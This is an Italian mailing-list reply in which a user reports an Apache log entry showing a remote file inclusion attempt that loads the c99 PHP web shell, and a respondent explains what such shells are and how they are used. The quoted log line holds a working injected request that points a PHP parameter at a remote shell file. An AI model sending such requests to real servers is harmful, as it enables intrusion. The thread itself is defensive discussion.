Re: [ml] shell 99

Il giorno 30/gen/08, alle ore 00:31, David Galligani ha scritto:

> Ciao ragazzi ,
> innanzi tutto grazie a tutti coloro che mi hanno risposto sul tema  
> dell' ecommerce .
> Mi trovo a scrivervi di nuovo , perchè stavo guardando i log del mio  
> apache2 ( alla tv non danno niente di interessante :D )  .
> E ho trovato questo :
>
> 81.246.45.219 - - [29/Jan/2008:21:29:34 +0100] "GET /admin/ 
> business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt? 
>  HTTP/1.1" 404 231
>
> Incuriosito sono andato a vedere questo c99.txt , che di txt ha  
> veramente poco
> Non pago , me lo sono scaricato per vedere che faceva  , l'ho  
> installato sul mio portatile e  l'ho fatto girare .
> Risultato , una pseudo shell in php ( devo dire molto carina ) con  
> cui sono riuscito a navigare fino alla / , anche se non mi faceva  
> vedere files su cui non avevo permessi ...
> Inoltre , ha tentato di mandare varie mail :
>
> [...]
>
> Qualcuno sa qualcosa di piú  su questo exploit ?
> In caso qualcuno volesse studiarselo lo trova qui di seguito  ( in  
> attach non me lo fa mandare l'antivirus ...)
>
> Ciao
>
> David

Tecnicamente non ha nulla a che vedere con un exploit.. Come hai avuto  
modo di appurare tu stesso, è semplicemente uno script in PHP che  
permette di automatizzare e semplificare la navigazione all'interno  
del filesystem e qualche altra operazione. Non è nulla di nuovo,  
circolano da alcuni anni questi script negli ambienti underground,  
sono particolarmente apprezzati da cracker russi. Quello che tu hai  
trovato (c99shell) è uno dei due più noti, l'altro è r57, e poi tanti  
altri.. Vengono usati soprattutto per ottimizzare lo sfruttamento di  
vulnerabilità di tipo remote file inclusion nelle web application (http://lwn.net/Articles/203904/ 
), controlla che sul tuo sito sia tutto a posto.

Saluti,

Alberto Trivero